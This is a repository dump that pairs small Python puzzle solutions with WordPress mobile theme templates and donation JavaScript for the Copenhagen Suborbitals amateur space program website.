while len(senators_counter) > 0:
senators_to_evict = choose_next_to_evict(senators_counter)
remove_senators(senators_counter, senators_to_evict)
eviction_plan.append(senators_to_evict)
return format_results(eviction_plan)
if __name__ == '__main__':
num_test_cases = int(input())
for i in range(1, num_test_cases + 1):
num_parties = int(input())
parties = [c for c in string.ascii_uppercase[:num_parties]]
senators_count_per_party = [int(s) for s in input().split(" ")]
counter = dict(zip(parties, senators_count_per_party))
print("Case #{}: {}".format(i, evict_the_senate_iter(counter)))
<file_sep>/last_word.py
# Related blog post - https://algoritmim.co.il/2019/06/18/last-word/
def find_last_word(s):
last_word = ""
i = len(s) - 1
while i >= 0 and s[i] == " ":
i -= 1
while i >= 0 and s[i] != " ":
last_word = s[i] + last_word
i -= 1
return last_word
def run_tests():
assert find_last_word("") == ""
assert find_last_word(" ") == ""
assert find_last_word("a") == "a"
assert find_last_word("dog ") == "dog"
assert find_last_word("hello world") == "world"
if __name__ == '__main__':
run_tests()
|
7391f93d14d2a6f7fab486f0b0d4832f82ea9e70
|
[
"Markdown",
"Python",
"Go",
"Shell"
] | 58 |
Python
|
mgershovitz/maya_solves
|
a8de1f05d5d078f39f991d67473ee8a283322dbf
|
cfba554c073c8ee0a9753c48372fc2d257b9b801
|
refs/heads/master
|
<repo_name>copsub/wp-touch-copsub<file_sep>/copsub/default/template_the-team.php
<?php
/*
Template Name: The Team Template
*/
?>
<?php get_header();
global $post;
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<section class="text">
<?php
echo '<div class="personnel"><h3>Mission Specialists</h3></div>';
$type = 'personel';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'caller_get_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'team' => 'mission-specialists' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$job_area_personel = get_field( '_job_area', get_the_id() );
?>
<div style="width:330px; float: left; margin-bottom: 20px;" class="personnel">
<div style="float:left; margin-right:20px;" class="personnel-img">
<?php
if ( has_post_thumbnail( $_post->ID ) ) {
echo the_post_thumbnail( array(100, 100) );
} else {
echo '<img width="100" height="100" src="' . get_site_url() . '/wp-content/themes/cphsuborbitals/img/siluet.jpg" class="personnel-siluet" alt="siluet">';
}
?>
</div>
<div style="margin-top:5px;">
<div style="font-size: 18px; font-weight: bold;"><?php the_title(); ?></div>
<div style="font-weight: bold; color:#777"><?php echo $job_area_personel; ?></div>
</div>
</div>
<?php
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo '<div class="personnel" style="clear: both;"><h3>Support Group</h3></div>';
$type = 'personel';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'caller_get_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'team' => 'support-group' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$job_area_personel = get_field( '_job_area', get_the_id() );
?>
<div style="width:330px; float: left; margin-bottom: 20px;" class="personnel">
<div style="float:left; margin-right:20px;" class="personnel-img">
<?php
if ( has_post_thumbnail( $_post->ID ) ) {
echo the_post_thumbnail( array(100, 100) );
} else {
echo '<img width="100" height="100" src="' . get_site_url() . '/wp-content/themes/cphsuborbitals/img/siluet.jpg" class="personnel-siluet" alt="siluet">';
}
?>
</div>
<div style="margin-top:5px;">
<div style="font-size: 18px; font-weight: bold;"><?php the_title(); ?></div>
<div style="font-weight: bold; color:#777"><?php echo $job_area_personel; ?></div>
</div>
</div>
<?php
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
?>
<div style="clear: both;"></div>
</section>
</div>
</div>
</div>
<?php get_footer(); ?>
<file_sep>/copsub/default/header.php
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<title><?php wp_title( ' | ', true, 'right' ); ?></title>
<?php wptouch_head(); ?>
<?php
if ( !is_single() && !is_archive() && !is_page() && !is_search() ) {
wptouch_canonical_link();
}
if ( isset( $_REQUEST[ 'wptouch_preview_theme' ] ) || isset( $_REQUEST[ 'wptouch_switch' ] ) ) {
echo '<meta name="robots" content="noindex" />';
}
?>
<style>
<?php
//Dynanic styles for mobile theme
$background_image_magnification = 160;
$background_image_front_section_1 = get_field( 'background_image_front_section_1', 'option' );
$background_image_front_section_1_ratio = ($background_image_front_section_1[height]/$background_image_front_section_1[width])*($background_image_magnification-1);
$background_image_front_section_2_ratio = (1306/1800)*($background_image_magnification-1);
$background_image_front_section_3_ratio = (1200/1800)*($background_image_magnification-1);
$background_image_front_section_4_ratio = (3850/1800)*($background_image_magnification-1);
$background_image_front_section_5_ratio = (699/1800)*($background_image_magnification-1);
?>
<!--
.wrapper_front_section_1 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo $background_image_front_section_1[url] ?>');
}
.wrapper_front_section_1:after {
padding-top: <?php echo $background_image_front_section_1_ratio; ?>%;
}
.main_front_section_1_overlay_3 {
}
.wrapper_front_section_2 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-top-bck.jpg');
}
.wrapper_front_section_2:after {
padding-top: <?php echo $background_image_front_section_2_ratio; ?>%;
}
.main_front_big_button_S2O3_1 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/donatesquare.png');
background-size: 40%;
background-position: right bottom;
background-repeat: no-repeat;
}
.main_front_big_button_S2O3_2 {
}
.main_front_big_button_S2O3_3 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/square_download.png');
background-size: 40%;
background-position: right bottom;
background-repeat: no-repeat;
}
.wrapper_front_section_3 {
}
.wrapper_front_section_3:after {
padding-top: <?php echo $background_image_front_section_3_ratio; ?>%;
}
.wrapper_front_section_4 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-spica-bck.jpg');
}
.wrapper_front_section_4:after {
padding-top: <?php echo $background_image_front_section_4_ratio; ?>%;
}
.wrapper_front_section_5 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-color: #000;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-bottom-bck.jpg');
}
.wrapper_front_section_5:after {
padding-top: <?php echo $background_image_front_section_5_ratio; ?>%;
}
.main_front_section_5_overlay_2 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/donatebutton.png');
background-size: contain;
background-position: center center;
background-repeat: no-repeat;
}
-->
</style>
</head>
<body <?php body_class( wptouch_get_body_classes() ); ?>>
<?php do_action( 'wptouch_preview' ); ?>
<?php do_action( 'wptouch_body_top' ); ?>
<?php get_template_part( 'header-bottom' ); ?>
<?php do_action( 'wptouch_body_top_second' ); ?>
<file_sep>/copsub/default/donation.js
jQuery.get("http://ipinfo.io", function (response) {
if (response.country == "DK") {
jQuery("#currency_code").val("DKK");
}
if (response.country == "DE") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "SE") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "NO") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "ES") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "US") {
jQuery("#currency_code").val("USD");
}
}, "jsonp");
function payWithBankTransferCallback(data){
jQuery('#bank-transfer-modal-content').html('<h1>Thank you for your donation!<br/></h1><h3>Please check your email.</h3>');
}
function payWithBankTransfer(){
if (jQuery('#amount-field').val() == ''){
alert('Please enter an amount');
return;
}
var data = { action: 'dgx_donate_bank_transfer', email: jQuery('#bank-transfer-email').val(), amount: jQuery('#amount-field').val(), currency: jQuery('#currency_code').val(), monthly: jQuery('#supporter').is(":checked") };
jQuery.post( '/wp-admin/admin-ajax.php', data, payWithBankTransferCallback );
jQuery('#bank-transfer-modal-content').html('<h3>Loading...</h3>');
return false;
}
function payWithPaypalCallback(data){
// Copy the encrypted string into the form field
jQuery('#encrypted-field').val(data);
// Submit the form to Paypal
jQuery('#paypal-form').submit();
}
function payWithPaypal(){
if (jQuery('#amount-field').val() == ''){
alert('Please enter an amount');
return;
}
var data = { action: 'dgx_donate_paypal', amount: jQuery('#amount-field').val(), currency: jQuery('#currency_code').val(), monthly: jQuery('#supporter').is(":checked") };
jQuery.post( '/wp-admin/admin-ajax.php', data, payWithPaypalCallback );
return false;
}
<file_sep>/copsub/default/mission_template.php
<?php
/*
Template Name: Mission Landingpage Template (Mobile)
*/
?>
<?php get_header();
$server_name = $_SERVER['SERVER_NAME'];
$themepath = ( $server_name === 'sb1.local' ? 'http://sb1.local/wp-content/themes/cphsuborbitals' : CHILD_THEME_URI );
global $post;
$frontpage_id = get_option('page_on_front');
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
$mission_live_blog = get_field( 'mission_live_blog', $post->ID );
$about_the_mission_title = get_field( 'about_the_mission_title', 'option' );
$about_the_mission_content = get_field( 'about_the_mission_content', 'option' );
//var from settings page
$launch_time_date = get_field( 'launch_time_date', 'option' );
$launch_date = date('F jS', strtotime($launch_time_date));
$launch_message = get_field( 'front_launch_message', 'option' );
$time_hiding_countdown_frontpage = get_field( 'time_hiding_countdown_frontpage', 'option' );
$show_countdown_on_frontpage = get_field( 'show_countdown_on_frontpage', 'option' );
$activate_war_mode = get_field( 'activate_war_mode', 'option' );
$mission_landing_page_title_l1_normal_mode = get_field( 'mission_landing_page_title_l1_normal_mode', 'option' );
$mission_landing_page_title_l2_normal_mode = get_field( 'mission_landing_page_title_l2_normal_mode', 'option' );
$mission_landing_page_title_l1_war_mode = get_field( 'mission_landing_page_title_l1_war_mode', 'option' );
$mission_landing_page_title_l2_war_mode = get_field( 'mission_landing_page_title_l2_war_mode', 'option' );
$mission_landing_page_top_logo = get_field( 'mission_landing_page_top_logo', 'option' );
$mission_content_top = get_field( 'mission_content_top', 'option' );
$estimated_mission_plan = get_field( 'estimated_mission_plan', 'option' );
$live_blog_description = get_field( 'live_blog_description', 'option' );
$for_the_press_content = get_field( 'for_the_press_content', 'option' );
$more_about_image = get_field( 'more_about_image', 'option' );
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<?php while ( have_posts() ) : the_post(); ?>
<div class="post-page-content">
<section class="text">
<?php
/* SUB HEADER SECTION START ---------------------------------------------------------------------------------------------------------------------------- */
If ($activate_war_mode) {
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw;">
<tr>
<td style="height: 15vw;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 6.5vw;"><?php echo $mission_landing_page_title_l1_war_mode ?></div>
<div style="Color:#FF4F00; Font-size:3.5vw;font-weight: bold; line-height: 4.0vw;"><?php echo $mission_landing_page_title_l2_war_mode ?></div>
</td>
<td style="text-align:right; width: 25vw;">
<img src="<?php echo $mission_landing_page_top_logo[url] ?>" style="height:15vw;">
</td>
</tr>
<tr>
<td colspan="2" style="height: 5vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999">
</td>
</tr>
</table>
<?php } else { ?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw;">
<tr>
<td style="height: 15vw;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 6.5vw;"><?php echo $mission_landing_page_title_l1_normal_mode ?></div>
<div style="Color:#FF4F00; Font-size:3.5vw;font-weight: bold; line-height: 4.0vw;"><?php echo $mission_landing_page_title_l2_normal_mode ?></div>
</td>
<td style="text-align:right; width: 25vw;">
<img src="<?php echo $mission_landing_page_top_logo[url] ?>" style="height:15vw;">
</td>
</tr>
<tr>
<td colspan="2" style="height: 15vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999">
<div style="padding-top: 1.0vw;"><?php echo $mission_content_top ?></div>
</td>
</tr>
</table>
<?php
}
/* SUB HEADER SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
If ($activate_war_mode) {
/* LIVESTREAM SECTION START ---------------------------------------------------------------------------------------------------------------------------- */
?>
<iframe width="878" height="494" src="https://www.youtube.com/embed/<?php echo $url_for_steaming_link; ?>?rel=0&showinfo=0" frameborder="0" allowfullscreen></iframe>
<?php
/* LIVESTREAM SECTION END ----------------------------------------------------------------------------------------------------------------------------- */
}
If ($activate_war_mode) {
/* LIVEBLOG SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7;margin-top:1vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 8.5vw;padding-right: 10px;">Live blog</div>
<div style="Color:black; Font-size:3.5vw;font-weight: normal;line-height: 4.5vw;"><?php echo $live_blog_description ?></div>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php the_content(); ?>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1.0vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 4.5vw;padding-right: 1.0vw;">For the press</span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $for_the_press_content ?>
</td>
</tr>
</table>
<?php
/* LIVEBLOG SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
} else {
/* NEWS SECTION START --------------------------------------------------------------------------------------------------------------------------------- */
$query = new WP_Query( array(
'no_found_rows' => true, // counts posts, remove if pagination required
'update_pos t_meta_cache' => false, // grabs post meta, remove if post meta required
'update_post_term_cache' => false, // grabs terms, remove if terms required (category, tag...)
'post_type' => array( 'post' ),
'posts_per_page' => 3,
'category_name' => 'nexoe_news',
'order' => 'date'
) );
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7">
<tr>
<td style="height: 27.0vw; padding: 0 0 1.0vw 0;" >
<div class="latest_news">
<ul style="list-style: none; margin: 0;">
<?php if ( $query->have_posts() ) : $query->have_posts();
while ( $query->have_posts() ) : $query->the_post(); ?>
<li style="margin: 0 0.5vw 0 0.5vw; ">
<?php
printf( '<div class="missionnews"><div style="padding-top: 1vw;">%s</div><a href="%s">%s</a></div>', get_the_date( 'd.m.Y' ), get_permalink(), get_the_title() );
printf( '<div>%s</div>', wp_trim_words( strip_tags( get_the_content( '', TRUE ) ), 20 ) );
?>
</li>
<?php endwhile;
else :
endif;
wp_reset_postdata();
?>
</ul>
</div>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1vw;">
<tr>
<td style=" padding: 2.0vw 1.0vw 1.0vw 1.0vw;">
<?php echo $estimated_mission_plan ?>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1.0vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 4.5vw;padding-right: 1.0vw;">For the press</span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $for_the_press_content ?>
</td>
</tr>
</table>
<?php
/* NEWS SECTION END --------------------------------------------------------------------------------------------------------------------------------- */
}
/* NEWSLETTER-DONATE SECTION START -------------------------------------------------------------------------------------------------------------------- */
If (1) {
?>
<table style="width: 100%; background-color: #FF4F00; margin-bottom:1vw;margin-top:1vw;">
<tr>
<td style="height: 8.0vw; padding: 2.3vw 1.0vw 2.0vw 1.0vw;text-align: center;" >
<a style="color: white;font-weight: bold;font-size:25px;text-decoration: none;" href="<?php echo get_site_url()?>/support-us/">Donate here ></a>
</td>
</tr></table>
<table style="width: 100%; background-color: #FF4F00">
<tr>
<td style="padding: 2.0vw 1.0vw 1.0vw 1.0vw;">
<div>
<div style="margin-bottom: 5px;color: white;">
Sign up for our newsletter here:
</div>
<?php echo do_shortcode('[mc4wp_form id="11166"]') ?>
</div>
</td>
</tr>
</table>
<?php
}
/* NEWSLETTER-DONATE SECTION END --------------------------------------------------------------------------------------------------------------------- */
/* MISSION EXPLAINED SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; margin-top: 2.0vw;">
<tr>
<td style="height: 6.0vw; padding: 0 0 1.0vw 0;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 5.0vw;padding-right: 1.0vw;"><?php echo $about_the_mission_title ?></span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 3.0vw 0 1.0vw 0;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $about_the_mission_content ?> </td>
</tr>
</table>
<?php
/* MISSION EXPLAINED SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
/* MORE ABOUT SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<a href="<?php echo get_site_url()?>/roadmap/nexo-i/">
<div style="height: 50.0vw; width: 100%; margin-bottom: 0; margin-top: 2.0vw; display: block; margin-left: auto; margin-right: auto; background-color:#e7e7e7; background-image: url('<?php echo $more_about_image[url]; ?>'); background-repeat: no-repeat;background-position: center;background-size: 100%;">
<div style="width: 65.0vw;margin-left:23vw;text-align: right;padding-top:2.0vw;">
<div style="Color:#FF4F00; Font-size:4.5vw;font-weight: bold; line-height: 4.5vw;padding-bottom:1.0vw;">
See the Nexø I rocket in detail
</div>
<div style="margin-left:10vw;width: 55.0vw;Font-size:3.0vw; line-height: 4.0vw;padding-bottom:1.0vw;">
See our page with the Nexø I rocket information in all it's glorious detail.
</div>
</div>
</div>
</a>
<?php
/* MORE ABOUT SECTION END ------------------------------------------------------------------------------------------------------------------------------- */
/* PR SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<?php
/* PR SECTION END ------------------------------------------------------------------------------------------------------------------------------- */
?>
</section>
<?php edit_post_link( __( 'Edit', 'twentythirteen' ), '<span class="edit-link">', '</span>' ); ?>
</div>
<?php endwhile; ?>
</div>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?><file_sep>/copsub/default/template_donations.php
<?php
/*
Template Name: Donations Template
*/
?>
<?php get_header();
global $post;
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<form action="" id="donationform">
<div class="wrapper_donate_section_1">
<div class="main_donate_section_1_overlay_1 overlay_show">
<div style="font: 12.5vw helvetica, sans-serif; font-weight: bold; color: #FFFFFF;padding:0px;margin:0px;">Donate</div>
</div>
<div class="main_donate_section_1_overlay_2 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: bold; color: #FFFFFF;padding:0px;margin:0px;">How much would you like to give?</div>
</div>
<div class="main_donate_section_1_overlay_3 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: normal; color: #ff4f00;padding:0px;margin:0px;"><label for="supporter">Make this a monthly donation</label></div>
</div>
<div class="main_donate_section_1_overlay_4 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: normal; color: #FFFFFF;padding:0px;margin:0px;">
Even though everyone in Copenhagen Suborbitals are working for free, we need earth money to build spaceships. Tools, rent and materials are not free. This is a 100 % crowdfunded project. we need you to get into space!
</div>
</div>
<div class="main_donate_section_1_overlay_5 overlay_show">
<div style="font: 4.5vw helvetica, sans-serif; font-weight: normal; color: #FFFFFF;padding:0px;margin:0px;">Thanks</div>
</div>
<div class="main_donate_section_1_overlay_6 overlay_show">
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal; color: #ff4f00;padding:0px;margin:0px;">Now we're closer</div>
</div>
</div>
<div class="main_donate_section_1_overlay_7 overlay_show">
<div class="donate-button" id="paypal-donate" onclick="payWithPaypal();">
<div style="font: 3vw helvetica, sans-serif; font-weight: bold;">Donate</div>
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal;">via PayPal / Credit Card</div>
</div>
</div>
<div class="main_donate_section_1_overlay_8 overlay_show">
<div class="donate-button" id="bank-donate" onclick="jQuery('#bank-transfer-modal').show();">
<div style="font: 3vw helvetica, sans-serif; font-weight: bold;">Donate</div>
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal;">via Bank Transfer</div>
</div>
</div>
<div class="main_donate_section_1_overlay_9 overlay_show">
<input type="checkbox" id="supporter" name="supporter" value="supporter" style="margin-top:44%;margin-left:30%">
</div>
<div class="main_donate_section_1_overlay_10 overlay_show">
<input type="text" name="a3" id="amount-field" value="" style="">
</div>
<div class="main_donate_section_1_overlay_11 overlay_show">
<select name="currency_code" id="currency_code">
<option value="USD">USD</option>
<option value="DKK">DKK</option>
<option value="EUR">EURO</option>
</select>
</div>
<div class="main_donate_section_1_overlay_12 overlay_show">
<div style="width:100%;background:url('http://copenhagensuborbitals.com/ext/fbtab/dividerline.png') no-repeat;height:1px; "></div>
</div>
<div class="main_donate_section_1_overlay_13 overlay_show">
<div style="width:100%;background:url('http://copenhagensuborbitals.com/ext/fbtab/dividerline.png') no-repeat;height:1px; "></div>
</div>
</form>
<div id="bank-transfer-modal">
<a href="#" id="close" onclick="jQuery('#bank-transfer-modal').hide()">X</a>
<form action="#" id="bank-transfer-modal-content" onsubmit="payWithBankTransfer()">
<p>
Please enter your email address so we can send you the donation instructions:
</p>
<input style="width: 80%" id="bank-transfer-email" type="text" name="email"/>
<a class="button" href="#" onclick="payWithBankTransfer()">Send</a>
</form>
</div>
<!-- Replace with https://www.sandbox.paypal.com/cgi-bin/webscr for testing in the sandbox. Remember to change also the settings in dgx-donate-paypalstd.php -->
<form id="paypal-form" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" id="encrypted-field" name="encrypted" value="">
<input type="submit" value="Donate">
</form>
</div>
</div>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/copsub/default/template_front_sections.php
<?php
/*
Template Name: Frontpage Sections Template (Mobile)
*/
$activate_war_mode = get_field( 'activate_war_mode', 'option' );
if ($activate_war_mode) {
header("Location: " . site_url() . "/nexo/");
die();
}
?>
<?php get_header('front');
$server_name = $_SERVER['SERVER_NAME'];
global $post;
$title = get_field( '_frontpage_template_1_title', $post->ID );
$text = get_field( '_frontpage_template_1_text', $post->ID );
$video_id = esc_attr( strip_tags( trim( get_field( '_frontpage_template_1_video', $post->ID ) ) ) );
$themepath = ( $server_name === 'sb1.local' ? 'http://sb1.local/wp-content/themes/cphsuborbitals' : CHILD_THEME_URI );
//$url_for_steaming_link = get_field( 'url_for_steaming_link', $post->ID );
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
$url_for_post_link = get_field( 'url_for_post_link', 'option' );
$event_mode_active = get_field( 'event_mode_active', 'option' );
$url_link_ready = get_field( 'url_link_ready', 'option' );
$event_button_text = get_field( 'event_button_text', 'option' );
//var from settings page
$launch_time_date = get_field( 'launch_time_date', 'option' );
$launch_date = date('F jS', strtotime($launch_time_date));
$launch_message = get_field( 'front_launch_message', 'option' );
$time_hiding_countdown_frontpage = get_field( 'time_hiding_countdown_frontpage', 'option' );
$show_countdown_on_frontpage = get_field( 'show_countdown_on_frontpage', 'option' );
//Sections
$front_section_1_active = get_field( 'front_section_1_active', 'option' );
$background_image_front_section_1 = get_field( 'background_image_front_section_1', 'option' );
$front_section_1_headline_l1 = get_field( 'front_section_1_headline_l1', 'option' );
$front_section_1_link_button = get_field( 'front_section_1_link_button', 'option' );
$front_section_2_active = get_field( 'front_section_2_active', 'option' );
$front_section_3_active = get_field( 'front_section_3_active', 'option' );
$front_section_4_active = get_field( 'front_section_4_active', 'option' );
$front_section_5_active = get_field( 'front_section_5_active', 'option' );
/*
-------------------------
[ @-> gets latest blog ]
-------------------------
*/
$query_blog = new WP_Query( array(
'no_found_rows' => true, // counts posts, remove if pagination required
'update_pos t_meta_cache' => false, // grabs post meta, remove if post meta required
'update_post_term_cache' => false, // grabs terms, remove if terms required (category, tag...)
'post_type' => array( 'post' ),
'posts_per_page' => 6,
'category_name' => 'csblog',
'order' => 'date'
) );
?>
<div id="content">
<?php // ###Launch mode section start### ----------------------------------------------------------------------- ?>
<?php //Launch mode background
if ($front_section_1_active) {
?>
<div class="wrapper_front_section_1">
<div class="main_front_section_1"></div>
<?php //---Countdown section--------------- ?>
<div class="main_front_section_1_overlay_1 overlay_show">
<?php
switch ($show_countdown_on_frontpage) {
case "hidden":
echo '<div class="front_launch_countdown"></div>';
break;
case "message":
echo '<div class="front_launch_countdown">';
echo '<div class="front_launch_message">'.$launch_message.' '.$launch_date.'</div>';
echo '</div>';
break;
case "countdown":
if (strtotime('now') <= $time_hiding_countdown_frontpage) {
echo '<div class="front_launch_countdown">';
echo do_shortcode( '[ujicountdown id="NextTest2" expire="'.$launch_time_date.'" hide="true" url="" subscr="Nexø I Launch" recurring="" rectype="second" repeats=""]' );
echo '</div>';
} else {
echo '<div class="front_launch_countdown">';
echo '<div class="front_launch_message">'.$launch_message.'</div>';
echo '</div>';
}
break;
}
?>
<?php if($show_countdown_on_frontpage && ($time_hiding_countdown_frontpage >= strtotime(now))) {
} else {?>
<?php } ?>
</div>
<?php //---Countdown section End ---------- ?>
<?php //---Front Text Launch section--------------- ?>
<div class="main_front_section_1_overlay_2 overlay_show">
<?php echo $front_section_1_headline_l1;?>
</div>
<?php //---Front Text Launch section End ---------- ?>
<?php //---Front Mission Page Button section--------------- ?>
<a style="text-decoration: none;" href="<?php echo $front_section_1_link_button ?>" title="" onclick="_gaq.push(['_trackEvent','Media','Click','Watch Us on FP']);">
<div class="main_front_section_1_overlay_4 overlay_show">
Go to the mission page
</div>
</a>
<?php //---Front Mission Page Button End ---------- ?>
<?php //---Front Mission Patch section--------------- ?>
<div class="main_front_section_1_overlay_3 overlay_show">
<div>
<div style="margin-bottom: 5px;color: white;">
Sign up for our newsletter:
</div>
<?php echo do_shortcode('[mc4wp_form id="11166"]') ?>
</div>
</div>
</div>
<?php //---Front Mission Patch section End ---------- ?>
</div>
<?php } ?>
<?php //----------- Launch mode section end ----------------------------------------------------------------------- ?>
<?php //----------- Manned top section -----------------------------------------------------------------------------?>
<div class="wrapper_front_section_2">
<div class="main_front_section_2"></div>
<div class="main_front_section_2_overlay_1 overlay_show">
The world’s only amateur space program
</div>
<div class="main_front_section_2_overlay_2 overlay_show">
<div>We’re 50 geeks building and flying our own rockets. </div>
<div>One of us will fly into space. </div>
</div>
<div class="main_front_section_2_overlay_3 overlay_show">
<table style="height: 100%">
<tr>
<td class="main_front_big_button_S2O3_1">
<a style="text-decoration: none; color: black;" href="<?php $server_name ?>/support-us/" onclick="_gaq.push(['_trackEvent','Support','Click','Big donate button FP']);">
It’s 100 % nonprofit and crowdfunded. Please donate here.
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<?php if($event_mode_active) {?>
<?php if($url_link_ready) {?>
<td class="main_front_big_button_S2O3_2">
<a style="text-decoration: none;color: black;" href="<?php echo $url_for_steaming_link ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
<?php echo $event_button_text ?>
<div style="font-size: 2.5vw;margin-top: 5%">
Live feed - Click here.
</div>
<div style="padding: 5% 0% 0% 30%;"><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/testsquare.png" style="width: 55%;"></div>
</a>
</td>
<?php } else {?>
<td class="main_front_big_button_S2O3_2">
<a style="text-decoration: none;color: black;" href="<?php echo $url_for_post_link ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
<?php echo $event_button_text ?>
<div style="font-size: 2.5vw;margin-top: 5%">
Videolink will be made available here as soon as possible.
</div>
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<?php }?>
<?php } else {?>
<?php }?>
<td class="main_front_big_button_S2O3_3">
<a style="text-decoration: none;color: black;" href="<?php $server_name ?>/ressources/" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
Download posters, wallpapers and more here.
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<td>
</td>
</tr>
</table>
</div>
<div class="main_front_section_2_overlay_4 overlay_show">
<div>Aiming high:</div>
<div>The manned Spica mission</div>
</div>
<div class="main_front_section_2_overlay_5 overlay_show">
Every step we take is leading to flying a person into space on what will be our biggest rocket: Spica
</div>
